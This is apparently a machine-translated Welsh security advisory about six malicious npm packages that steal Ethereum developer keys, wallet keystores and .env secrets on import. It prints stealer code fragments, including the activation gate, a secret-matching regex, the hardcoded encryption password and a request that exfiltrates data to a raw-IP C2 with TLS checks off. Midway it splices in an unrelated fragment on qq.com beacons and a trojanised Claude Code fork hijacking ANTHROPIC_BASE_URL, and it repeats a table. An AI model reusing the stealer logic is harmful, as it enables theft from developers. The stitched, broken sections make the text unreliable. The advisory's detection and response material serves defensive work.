TL; DR
Ar Fai 6, 2026, cyhoeddwr npm sengl, namikazesarada010206, gwthiodd chwe phecyn maleisus yn targedu ecosystem datblygwyr Ethereum, Solidity, a DeFi.
Y pecynnau, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, a web3-utils-core, defnyddiodd enwau credadwy a gynlluniwyd i edrych fel llyfrgelloedd cynorthwyol ar gyfer offer Web3 poblogaidd.
Roedd y chwe phecyn i gyd yn cynnwys yr un peth telemetry.js ffeil. Roedd y ffeil yn union yr un fath â beit ar draws y clwstwr, gyda SHA-256:
Nid yw'r meddalwedd faleisus yn gweithredu ar adeg gosod. Nid oes preinstall or postinstall bachyn. Yn lle hynny, mae'n actifadu pan fydd y pecyn yn cael ei fewnforio drwyddo require().
Mae'r manylyn hwnnw'n bwysig.
Mae'r mewnblaniad yn aros nes bod datblygwr yn defnyddio'r pecyn mewn gwirionedd. Yna mae'n gwirio a yw'r orsaf waith yn edrych fel amgylchedd datblygu Ethereum / Solidity go iawn. Mae'n chwilio am allweddi Alchemy neu Infura, allweddi preifat, mnemonics, allweddi deployer, neu gyfeiriadur Foundry lleol.
Os yw'r gwesteiwr yn cyfateb, mae'r lleidr yn casglu allweddi preifat SSH, storfeydd allweddi waled Foundry / Geth / Brownie, .env* ffeiliau, a newidynnau amgylcheddol sensitif. Mae'n amgryptio'r bwndel gydag AES-256-GCM gan ddefnyddio cyfrinair caled-godio ac yn ei all-gludo i derfynbwynt IPv4 C2 crai gyda dilysu TLS wedi'i analluogi.
Cadarnhaodd system Rhybudd Cynnar am Feddalwedd Ddrwgwedd (MEW) Xygeni fod y chwe phecyn i gyd yn faleisus. Mae bwndel adroddiad tynnu'r gofrestrfa npm yn yr arfaeth.
Y Clwstwr: Chwe Phecyn, Un Cyhoeddwr
Cyfrif y cyhoeddwr namikazesarada010206 wedi'i gysylltu â'r cyfeiriad Gmail heb ei wirio namikazesarada010206@gmail.com.
Ymddangosodd yr ymgyrch fel cyhoeddiad byrstio un diwrnod ar Fai 6, 2026. Cafodd pob un o'r chwe phecyn eu fersiynau fel 1.0.0, nid oedd ganddo unrhyw ddibyniaethau amser rhedeg, ac fe anfonodd dair ffeil yn unig:
package.json index.js telemetry.js Fe wnaethant hefyd ddatgan yr un storfa ffynhonnell:
https://github.com/harunosakura030303-maker/evmchain-config Cafodd y tri phecyn cyntaf eu dal gan sganwyr MEW ar y cyhoeddiad cyntaf. Cafodd y tri sy'n weddill eu fflagio'n orfodol ar ôl adolygiad dadansoddwr o broffil npm y cyhoeddwr. Unwaith yr un fath â beit telemetry.js wedi'i gadarnhau ar draws y clwstwr, cawsant eu cau fel rhai maleisus trwy gysondeb.
| pecyn | fersiwn | npm Cyhoeddwyd | Tocyn MEW | Verdict |
|---|---|---|---|---|
| viem-craidd | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Maleisus |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | Maleisus |
| caled-het-craidd-utils | 1.0.0 | 2026-05-06 | #51051 | Maleisus |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Maleisus, trwy gysondeb |
| ffowndri-utils | 1.0.0 | 2026-05-06 | #51071 | Maleisus, trwy gysondeb |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Maleisus, trwy gysondeb |
Mae'r strategaeth enwi yn syml ond yn effeithiol.
Nid yw'r pecynnau hyn yn dynwared enwau union i fyny'r afon. Yn lle hynny, maent yn defnyddio ôl-ddodiaid "cyfleustodau" credadwy fel -core, -utils, a -utils-coreMae hynny'n eu gwneud yn edrych fel llyfrgelloedd cydymaith y gallai datblygwr ddisgwyl eu gweld ger offer Web3.
| Pecyn Maleisus | Targed Cyfreithlon |
|---|---|
| viem-craidd | viem, cleient Ethereum TypeScript poblogaidd |
| viem-utils-core | viem |
| caled-het-craidd-utils | hardhat, amgylchedd datblygu Solidity prif ffrwd |
| evm-utils | Gofod enwau offer EVM generig |
| ffowndri-utils | ffowndri, cadwyn offer Solidity |
| web3-utils-core | web3-utils, cynorthwywyr Web3.js |
Dyma batrwm y “pecyn atodol”: nid “Fi yw’r pecyn go iawn,” ond “Rwy’n edrych fel cynorthwyydd rhesymol o amgylch y pecyn go iawn.”
I ddatblygwyr DeFi sy'n symud yn gyflym, mae hynny'n ddigon i greu risg.
Beth Sy'n Digwydd Pan fydd y Pecyn yn Cael ei Mewnforio
Mae'r gadwyn ymosod yn fach, yn fwriadol, ac yn canolbwyntio ar amgylcheddau datblygu crypto.
Nid oes bachyn gosod. Yn lle hynny, mae pob pecyn yn cynnwys index.js sy'n allforio swyddogaeth stub ac yna'n llwytho'r modiwl telemetreg maleisus.
require('./telemetry').init(); Mae hyn yn golygu bod y meddalwedd faleisus yn actifadu ar y mewnforio cyntaf.
Mae hynny'n ddefnyddiol yn weithredol i'r ymosodwr. Mae llawer o sganwyr a blychau tywod yn canolbwyntio ar ymddygiad amser gosod. Mae'r pecyn hwn yn aros nes ei fod yn cael ei ddefnyddio mewn gwirionedd gan ddatblygwr, sgript adeiladu, cyfres brawf, neu lwybr amser rhedeg.
Giât Actifadu: Tanio ar Orsafoedd Gwaith Datblygwyr Web3 Go Iawn yn Unig
Y rhan bwysicaf o'r mewnblaniad yw'r giât actifadu.
Mae'r meddalwedd faleisus yn gwirio am newidynnau amgylcheddol a geir yn gyffredin ar beiriannau datblygwyr Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Mae hefyd yn gwirio a yw'n ymddangos bod Foundry wedi'i osod:
fs.existsSync(path.join(os.homedir(), '.foundry')) Os nad yw'r naill amod na'r llall yn wir, mae'r ffwythiant yn dychwelyd ac yn gwneud dim.
Mae hynny'n gwneud y pecyn yn dawelach mewn amgylcheddau dadansoddi generig. Gall blwch tywod heb Foundry, allweddi Alchemy, allweddi Infura, allweddi preifat, neu mnemonics weld mewnforio sy'n edrych yn ddiniwed.
Ar westeiwr cyfatebol, mae'r meddalwedd faleisus yn aros 60 i 90 eiliad cyn ei gasglu:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Mae'r oedi yn lleihau'r gydberthynas amlwg rhwng mewnforio ac all-hidlo. .unref() Mae call hefyd yn gadael i'r broses westeiwr adael fel arfer os mewnforiwyd y pecyn mewn sgript byrhoedlog.
Nid ymddygiad swnllyd o dorri a chipio yw hwn. Mae'n lladrad wedi'i dargedu sydd wedi'i gynllunio i osgoi rhedeg oni bai bod yr amgylchedd datblygwr yn werth ei ddwyn.
Beth mae'r Lleidr yn ei Gasglu
Unwaith y bydd y giât actifadu wedi mynd heibio, mae'r meddalwedd faleisus yn casglu o'r ffynonellau sydd bwysicaf mewn datblygu Web3: allweddi preifat, storfeydd allweddi waledi, manylion mewngofnodi defnyddio, cyfrinachau cwmwl, tocynnau npm, a chyfluniad prosiect lleol.
| ffynhonnell | Beth sy'n cael ei Gasglu |
|---|---|
| proses.amgylchedd | Unrhyw newidyn sy'n cyfateb i /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Ffeiliau sy'n cynnwys PRIVATE KEY neu BEGIN OPENSSH, gan gynnwys cynnwys llawn y ffeil |
| ~/.foundry/allweddstorfeydd/* | Ffeiliau storfa allweddi waled Foundry |
| ~/.ethereum/storfa allweddi/* | Ffeiliau storfa allweddi waled Geth |
| ~/.brownie/cyfrifon/* | Ffeiliau storfa allweddi waled Brownie |
| ${cwd}/.amgylchedd | Cynnwys ffeil llawn |
| ${cwd}/.amgylchedd.lleol | Cynnwys ffeil llawn |
| ${cwd}/.amgylchedd.cynhyrchu | Cynnwys ffeil llawn |
| ${cwd}/.amgylchedd.datblygiad | Cynnwys ffeil llawn |
| os.hostname() | Metadata'r gwesteiwr |
| crypto.randomUUID() | Dynodwr dioddefwr/sesiwn |
| Dyddiad.nawr() | Stamp amser casglu |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com Y tocynnau ATTA yw:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Nid ydym wedi gallu cadarnhau a oedd y telemetreg yn ddadansoddeg y gweithredwr ei hun neu'n sianel a ariannwyd ar wahân. Mae'r tocynnau ATTA yr un peth yn y ddau sampl a archwiliwyd gennym.
Clwstwr B: heibai
claude.hk Gwe-rwydo OAuth + Herwgipio ANTHROPIC_BASE_URL
Y sampl ar 1 Ebrill yw cangen gynharach, fwy crai'r ymgyrch.
heibai:2.1.88-claude.hk-4 cyhoeddwyd gan wuguoqiangvip28, cyfrif a grëwyd ar 7 Mehefin, 2025. Fersiwn benodol a wnaeth y pecyn ei hun yn erbyn y cyfreithlon 2.1.88 Rhyddhad anthropig.
Nid yw'n trafferthu gyda MITM CA-cert. Yn lle hynny, mae'n dweud celwydd wrth y defnyddiwr am y pwynt terfyn OAuth.
Mae'r ychwanegiadau maleisus ar ben y ffynhonnell Claude Code a ollyngwyd yn cynnwys:
| ffynhonnell | Beth sy'n cael ei Gasglu |
|---|---|
| proses.amgylchedd | Unrhyw newidyn sy'n cyfateb i /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Ffeiliau sy'n cynnwys PRIVATE KEY neu BEGIN OPENSSH, gan gynnwys cynnwys llawn y ffeil |
| ~/.foundry/allweddstorfeydd/* | Ffeiliau storfa allweddi waled Foundry |
| ~/.ethereum/storfa allweddi/* | Ffeiliau storfa allweddi waled Geth |
| ~/.brownie/cyfrifon/* | Ffeiliau storfa allweddi waled Brownie |
| ${cwd}/.amgylchedd | Cynnwys ffeil llawn |
| ${cwd}/.amgylchedd.lleol | Cynnwys ffeil llawn |
| ${cwd}/.amgylchedd.cynhyrchu | Cynnwys ffeil llawn |
| ${cwd}/.amgylchedd.datblygiad | Cynnwys ffeil llawn |
| os.hostname() | Metadata'r gwesteiwr |
| crypto.randomUUID() | Dynodwr dioddefwr/sesiwn |
| Dyddiad.nawr() | Stamp amser casglu |
Mae'r rhestr dargedau yn benodol iawn. Nid lladrad porwr generig na chrafu manylion mewngofnodi eang yw hwn. Mae wedi'i anelu at ddatblygwyr sy'n adeiladu, profi, defnyddio neu weithredu cymwysiadau Ethereum.
Mae cynnwys storfeydd allweddi Foundry, Geth, a Brownie yn arbennig o bwysig. Gall y ffeiliau hyn gynrychioli mynediad uniongyrchol i waledi neu hunaniaethau defnyddio. Os gall yr ymosodwr eu paru â chyfrineiriau, mnemonics, neu gyfrinachau amgylchedd, efallai y byddant yn gallu symud arian, dynwared defnyddiowyr, neu beryglu gweithrediadau contract clyfar.
Amgryptio Cyn All-hidlo
Mae'r meddalwedd faleisus yn amgryptio'r data a gesglir cyn ei anfon allan.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Y cyfrinair caled yw:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Mae'r llwyth tâl terfynol wedi'i lapio fel JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Nid yw amgryptio yn gwneud y meddalwedd faleisus yn fwy datblygedig ynddo'i hun. Fodd bynnag, mae'n gwneud archwilio rhwydwaith yn anoddach. Byddai amddiffynwr sy'n gwylio allfa yn gweld llwyth tâl JSON, ond nid yr allweddi wedi'u dwyn, ffeiliau waled, nac .env cynnwys heb y cyfrinair caled a'r rhesymeg dadgryptio.
All-hidlo i IPv4 Crai C2
Mae'r llwybr all-hidlo wedi'i godio'n galed:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Mae'r meddalwedd faleisus yn anfon data i:
https://76.13.37.80:8443/api/v1/telemetry Mae dau fanylyn yn sefyll allan.
Yn gyntaf, cyfeiriad IPv4 crai yw'r C2 yn hytrach na pharth. Mae hynny'n dileu'r angen i gofrestru parth ac yn osgoi rhai canfodiadau sy'n seiliedig ar barth.
Yn ail, mae dilysu TLS wedi'i analluogi gyda:
rejectUnauthorized: false Mae hynny'n caniatáu i'r meddalwedd faleisus dderbyn unrhyw dystysgrif, gan gynnwys tystysgrifau hunan-lofnodedig. Mewn geiriau eraill, mae'r ymosodwr yn cael cludiant wedi'i amgryptio heb fod angen tystysgrif gyhoeddus ddilys.
Nid oes rhesymeg ail-geisio na gwesteiwr wrth gefn. Mae gwallau'n cael eu llyncu'n dawel. Mae hyn yn cadw'r pecyn yn dawel os yw'r C2 all-lein neu'n anghyraeddadwy.
Pam Mae'r Ymgyrch Hon yn Bwysig
Mae'r rhan fwyaf o becynnau npm maleisus sydd wedi'u hanelu at ddatblygwyr yn mynd ar ôl manylion mewngofnodi eang: tocynnau npm, allweddi AWS, tocynnau GitHub, neu .npmrc ffeiliau.
Mae'r ymgyrch hon yn culhau'r targed.
Mae'n chwilio am arwyddion bod y peiriant yn perthyn i ddatblygwr Ethereum neu Solidity. Yna mae'n tynnu'r union asedau sy'n bwysig yn yr amgylchedd hwnnw: storfeydd allweddi waled, allweddi preifat, mnemonics, allweddi deployer, .env ffeiliau, ac allweddi SSH.
Mae hynny'n gwneud yr ymgyrch yn fwy peryglus i dimau Web3 na lladrad npm generig.
Gallai haint llwyddiannus ddatgelu:
- Waledi defnyddio
- Allweddi gweinyddu contract clyfar
- Allweddi darparwr RPC
- Manylion defnyddio cwmwl
- tocynnau cyhoeddi npm
- Mynediad SSH i seilwaith datblygwr neu adeiladwr
- Cyfrinachau prosiect wedi'u storio yn
.envffeiliau - Storfeydd allweddi waled ar gyfer Foundry, Geth, neu Brownie
Mae enwau'r pecynnau hefyd yn dangos peirianneg gymdeithasol glir. Maent yn targedu ecosystem datblygwyr Web3 trwy enwau offer cyfarwydd: viem, hardhat, foundry, evm, a web3.
Nid oes angen i'r actor gyfaddawdu ar y prosiectau go iawn. Dim ond angen i ddatblygwr osod yr hyn sy'n edrych fel pecyn cydymaith rhesymol.
Dangosyddion o Gyfaddawd a Chanfod
| Pecynnau a Chyhoeddwr | |
|---|---|
| Maes | Gwerth |
| cyhoeddwr npm | namikazesarada010206 |
| E-bost y cyhoeddwr | namikazesarada010206@gmail.com |
| e-bost wedi'i wirio | Na |
| SCM gwirio | Na |
| Sgôr enw da | 1.0 |
| Pecynnau | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, ffowndri-cyfleustodau, gwe3-utils-core |
| fersiynau | Mae pob 1.0.0 |
| Storfa ffynhonnell | https://github.com/harunosakura030303-maker/evmchain-config |
| Wedi'i gadarnhau'n faleisus | Pob chwe phecyn |
| Rhwydwaith | |
|---|---|
| math | Gwerth |
| Terfyn terfyn C2 | https://76.13.37.80:8443/api/v1/telemetry |
| IP C2 | 76.13.37.80 |
| Porthladd C2 | 8443/tcp |
| Ymddygiad TLS | gwrthodHeb awdurdod: ffug |
| Cynllun llwyth tâl | {"v":2,"iv": "d": "t": } |
| Ffeiliau a Hashes | |
|---|---|
| math | Gwerth |
| telemetreg.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Cynllun y pecyn | pecyn.json, mynegai.js, telemetreg.js |
| Cyfrif ffeiliau | 3 |
| Maint cyfanswm bras | 3.4 KB |
Signalau Actifadu
Mae'r meddalwedd faleisus yn gwirio am y newidynnau amgylcheddol hyn:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Mae hefyd yn gwirio am:
~/.foundry/ Llwybrau Gwesteiwr Targedig
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Regex Casgliad
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Nodiadau Canfod
Mae sawl rheol yn dal yr ymgyrch hon heb fod angen dadansoddiad ymddygiadol llawn.
Yn gyntaf, sganiwch ffeiliau clo am y chwe enw pecyn maleisus:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Unrhyw gêm yn package-lock.json, yarn.lock, pnpm-lock.yaml, neu node_modules dylid trin hanes fel digwyddiad difrifol.
Yn ail, monitro am brosesau Node.js sy'n darllen llwybrau allweddell waled:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Anaml y bydd hwn yn ymddygiad cyfreithlon ar gyfer pecyn a fewnforiwyd fel dibyniaeth gynorthwyol. Mae'n arbennig o amheus pan gaiff ei ddilyn gan weithgarwch rhwydwaith allanol.
Yn drydydd, blociwch neu rybuddwch ar gysylltiadau HTTPS i:
76.13.37.80:8443 Yn enwedig pan fo llwybr y cais yn:
/api/v1/telemetry Yn bedwerydd, chwiliwch am becynnau npm sy'n cyfuno'r nodweddion hyn:
- Cyhoeddwr newydd neu â henw da isel
- Cyfrif Gmail heb ei wirio
- Enw pecyn cyfagos i Web3
- Dim hanes ystorfa ystyrlon
- Cynllun pecyn bach
index.jssy'n llwytho ffeil telemetreg neu ffeil gynorthwyol- Dim dibyniaethau amser rhedeg
- Casgliad newidynnau amgylchedd sensitif
- Mynediad i storfa allweddi waled
Mae'r patrwm hwn yn fwy defnyddiol nag un IOC oherwydd gall y pecyn nesaf newid y cyfeiriad IP ond cadw'r un rhesymeg dargedu.
Rhestr Wirio Ymateb i Gyfaddawd
Os defnyddiodd datblygwr un o'r chwe phecyn a bod eu hamgylchedd yn cyfateb i'r giât actifadu, ystyriwch y gweithfan fel pe bai wedi'i chyfaddawdu.
Mae hynny'n cynnwys peiriannau gyda Foundry wedi'i osod, allweddi Alchemy neu Infura yn yr amgylchedd, allweddi preifat, mnemonics, neu allweddi defnyddio.
Ymateb a argymhellir:
- Datgysylltwch y gwesteiwr o'r rhwydwaith.
- Cadw
node_modules, ffeiliau clo, hanes cragen, a logiau perthnasol ar gyfer fforensig. - Cylchdroi pob pâr allweddi SSH o dan
~/.ssh/. - Cylchdroi allweddi waled ar gyfer pob storfa allweddi oddi tano
~/.foundry,~/.ethereum, a~/.brownie. - Symudwch arian i waledi newydd.
- Cylchdroi pob cyfrinach sydd wedi'i storio yn
.env*ffeiliau mewn ystorfeydd y gweithiodd y datblygwr ynddynt. - Cylchdroi cyfrinachau amgylchedd sy'n cyfateb i'r regex casgliad, gan gynnwys allweddi AWS, tocynnau npm, tocynnau defnyddio, allweddi API, allweddi preifat, hadau, a mnemonics.
- Archwilio gweithgaredd cwmwl, npm, GitHub, darparwr RPC, a blockchain ers i'r pecyn gael ei osod gyntaf.
- Ail-delweddu'r orsaf waith cyn ei hailddefnyddio.
Yr Hyn y Dylai Amddiffynwyr Ei Gymryd I Ffwrdd
Mae'r ymgyrch hon yn dangos sut mae typosquatting npm yn esblygu o amgylch ecosystemau datblygwyr gwerth uchel.
Nid oedd angen dyfalbarhad ar yr actor. Nid oedd angen drysu arnynt. Nid oedd angen gweithredu amser gosod arnynt hyd yn oed.
Yn hytrach, roedden nhw'n dibynnu ar dri pheth:
- Enwau pecynnau Web3 credadwy
- Dim ond ar beiriannau datblygu crypto go iawn y gellir eu actifadu
- Lladrad uniongyrchol o'r ffeiliau a'r cyfrinachau sydd bwysicaf i ddatblygwyr Ethereum
Mae hynny'n gwneud yr ymgyrch yn hawdd i'w cholli mewn sganio eang ac yn beryglus pan fydd yn glanio yn yr amgylchedd cywir.
I dimau Web3, mae'r wers yn glir: trin enwau dibyniaethau fel rhan o'ch model bygythiad. Gall pecyn sy'n edrych fel cynorthwyydd diniwed ddod yn llwybr byrraf i beryglu waled o hyd.
Wedi'i adrodd i'r gofrestrfa npm. Byddwn yn diweddaru'r post hwn pan fydd cyfrif a phecynnau'r cyhoeddwr yn cael eu tynnu.




